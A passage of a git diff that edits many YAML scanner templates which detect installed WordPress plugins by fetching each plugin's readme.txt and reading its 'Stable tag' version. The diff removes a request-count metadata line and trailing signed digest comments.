+47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100ae9585a6cf125af78143d7ad7e6309ff3896525d6e6b06fd544a9805e41891c302202ca41e68ae203145f1d55ee4d74c9cc18e6843132d90a2b0e381b951719d5fee:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index de8475506a..5c5decc127 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: - max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/disable-comments/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100ff988001aa8dcc9d3a6204b152ae095468384cd284cc5dd6a971a250d4619c68022040633d1ddcc639f008cdd8a3fd88daf41cfe92abc815162dab4f32c1185ab1f2:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 99a1bdba9d..a8229a338e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: - max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/disable-gutenberg/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221009be04d16d494d5f360828211bf446dc2655b12ba224cd99a6fb39a23f79334f802206a60d67122a97d23f791494aa3b0d5131b5840162a88c3324b4710b0ab03a9bf:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 93936d25d0..6559e64dce 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: - max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/duplicate-page/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100bc7f8fad3ca887178cb543cc3d73dc3f74836c6a3d3cf696d8c2f0b592a39ab602210086ee2d83913d80edb5322a9278a8a4a5beaa0716f0721b6baa48884471163068:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4396b9da2..a4368b8aa6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: - max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/duplicate-post/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100f0ab3f7dcd0f0a78b42654e199e7c4c62d718029595b72eec1d683b1655e2c480220616990333df64db2b4931c433ca3e9a823d5d7afc744d1f250c426b00e7846c6:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index 6da1b29f1f..ec119e762a 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: - max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/duplicator/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022076ca018e13ac417755e20c38e6ef9af7b0a818f13fce8d1426cde62ba0efd80b022100f4417e977fcd4198f258e5615ffd692ad18d6796bebb3c3d6a9704b0f9de0542:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 570a39272b..b7ec7576a3 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: - max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/duracelltomi-google-tag-manager/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100e79d0228776f41e0b8ffe221ab48addec492e9ac9019a22bfc6422e1251b2320022100de9c40c238f1abad98d03264bdb2c1812d37e1e32d80ee50e0ab5e696dbfce76:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index e84ca14f7e..c42d679973 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: - max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/easy-fancybox/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100bdaa1718f4583deacd9b5a2a1e65cb65da61ca8350dab43f27a7c371f52528c9022100fde7dc41243705555a4c69a477221aa168794830416aa277267de0f8605e1e7c:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 145c800dd4..fc44375947 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: - max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/easy-table-of-contents/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100fcf9304ad11f62e579e822f4f9db77596269924b4701ec8aeaa9e7efffed42b102204f77ee05eb20d644bd56009b01bc0dc64b0d81da0d6ebc8a1c9a4b56f2a07de5:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 528efe4fe0..a1616c1741 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: - max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100f5b7bb6177e4c440ad6f9f0f7a7af92f69982494273e647cae202ea06ddde9ef022100927df25a96d96c96778d4c496afe3c206fc11a3471ae728b4c2429ebc0e6c7c8:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 29b62b6237..6cfb8bc272 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: - max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/elementor/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100b0057547769516eb62fd04b1728754290fa53ea546d25c933c037894fa47849b022100d8aadb646bfca16deff8d719fddbd783e66de71064e3637afb1b768368f085ff:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index d1993cae7d..9caaa53263 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: - max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/elementskit-lite/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100f019ad1fdf16ee50f6e33b4964dbc2b9112f8ae1696ad93676d47520c515cbda022100ca80a79ac4cd9fce43f34c0c7f0a7b5c96c3cd0a01836a80d7b025f8b5369fde:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index a3add7f50c..5e6b557952 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: - max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/enable-media-replace/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022056046b608fd5274c96ea92e191350551a8fa85e695f4522e8ba14aeb4febea0d02206eda9cb539432c55db6fa3217f1cd23ae3620ff3746f7aa86f0e4a28eb02756a:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 588a4fb4f0..c5a665e6f7 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: - max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/envato-elements/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100d8923b6a234938e4a0f73bd9fb3c52712f9e55896c8548ca40898622328e1be2022100bd7418d52a81f5f2ac17a8cdeea13c0a2c9600603262064b23fd26eca9a997f3:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index dfdc590709..a8b56b5df0 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: - max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022079f57122256536e3105ce2a543b574091d1e28ca9ddf1caa039ed4ecd5a9e2f0022100abadfd446458cae496da1090eec79564acd2bb5031ffdef4d69fa4b2a8d612dd:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index c779f291d1..4e20e57107 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: - max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/ewww-image-optimizer/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100d0e91d74071e5046975ce49d6b7aa59f9c98ccb17a6927d46530238e618bf18c022100b591ac09231f71579cca41033f5b9ca26f6023cc4d25cf710a3af093dabc4488:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index d30bc30069..6f6a416595 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/facebook-for-woocommerce/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100adbe0ca03285a4a368c2af99bbef73e67b0c50ed8f8ab7e6337f80429099d65f02203c9f6fb2723447d9bba8775f67f40d60385cbe92bf98a0fb2806091d77cf7b45:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 0a19ece461..2dd0ef57b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: - max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/fast-indexing-api/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402207899acbf46ed6bebe6dc31f249f43331868d780f59720183307769a6138a26690220767b69fdbf3f4a447d27f684fecbfa6ea9714b1f8b840732f890ccc9371aaeee:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index eefdceb2c5..11942f4fa4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: - max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/favicon-by-realfavicongenerator/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100d7587f838fa2523389607669a81f3a7c8081d46c5687307bd5d3c0095b4ebcf2022002975ba15dc94ab7f4883d9d11f2b1731f75b56d9c19212197f82f1adb8964a7:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index c10d700852..87c2aeb4bd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: - max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/flamingo/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402200b1a3f60ac2be07f86d2087094d691823a366d134f70308016c145521d88e34f02201e4dbd47ac9fcb27440dbf7c56108aec74fc4a65599f37e0d7b163ed775431d9:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 7dc0007fa4..3696eefbf7 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: - max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/fluentform/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100b3c21aae684fa6aed14e3cec7ec1243bc796e1e8ad283c8f929f510ecb0401c4022100f0359a74a558c4c28730c4b9890005398424efb2fa95811ab7df872f176ca62a:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index f117996fcc..8bab0a9c3e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: - max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/font-awesome/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221008cf70bd8fabab56b99fd2a364c70a146aed3a1b67458f437768b9444c574149602200482f82f0623108a99a7151580012c2fb089e96299d2e3fac4b21b9a861e2975:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 28b903c2af..affd270123 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/force-regenerate-thumbnails/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502202a4492ec150d2662a68b154c69c9fa21e447180d26ae15f69ed8179e226c834a022100bce4150bd1de3a8cf656890e4a26d8281ba75e01ad863521d05fef214da61979:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1524ea2bed..4ba4fbeff4 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: - max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/formidable/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100a111fe3c571edb6c44002d8bbec3996134934990fee4601e507e37869a209c5402207798ec4350375013793c4fae9c4cb612ff1ec3764b513de626ab67b9cdcc78f0:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 57d06a9acd..980265f531 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: - max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/forminator/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221009c18db8625ff9aec58ded3915d001dd74fe587a32d687a10d19a43821841e0e902201f54ced3067e71bc54577e997b291e36a5143a70763ba9ba5c02fea9ea2a54d3:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 252ccaea20..daf205789d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: - max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/ga-google-analytics/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220518d2fc3d68bb2a38dbde1f899e424e86e31f081139688779644b8c119bcc8da022100af2535c441dce75f60f616ec6f32c2a871186b991e474f504087aaeac402a6be:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index b0f88ab75e..22bfa3ffe2 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: - max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/gdpr-cookie-compliance/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502203dc7d51154f02e46f547d7db2736732abc35c204328f8af5e1ff9cc8e8b3fad9022100c89d73298a9eb22f6ce76cbb3ee0163d75b7aa3352bfeddc04c3ed3148ecb2d9:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index aabcf3cc0d..7ed171d662 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: - max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/google-analytics-dashboard-for-wp/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100a9499704b5bcb42c1a950bfaa8436e79a3881b401427fd70587b4c70890a5ee7022002ea8b4f198dd076406e2288785b260187d47dd81a7f258fdf35e404cc7773f5:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 723b906712..ad238445fc 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: - max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/google-analytics-for-wordpress/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402202c964f3bdf0a42e6834ecbba6e08f6842bd004aec532da2f617272902ab14fc602207b398840da3d983bc3a98ee933baf8bc5ef4bf9a9a894f45ecf27b37b208d2ea:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b1a9527bd4..7161671960 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: - max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/google-listings-and-ads/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502206fd2a815aa43cf75ec27ba398f8c715596c98153d3cf578b6aeee85f1d6e025102210097a349f855e63184bc6630a7b411ad55c6065b706bdc073d70e719cc7db92eb1:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 9a12f80093..2678f603c6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: - max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/google-site-kit/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100ad7c44467a19273da0f7adb3a612dead35642c15f8f612b6741125eccc190db5022100b1b23a5dee7d39e050deed3a8942b1eeec13febd33af2c8ed2eb5b19f59e8c9a:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 77a0959d9d..20d947a5d1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: - max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/google-sitemap-generator/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - 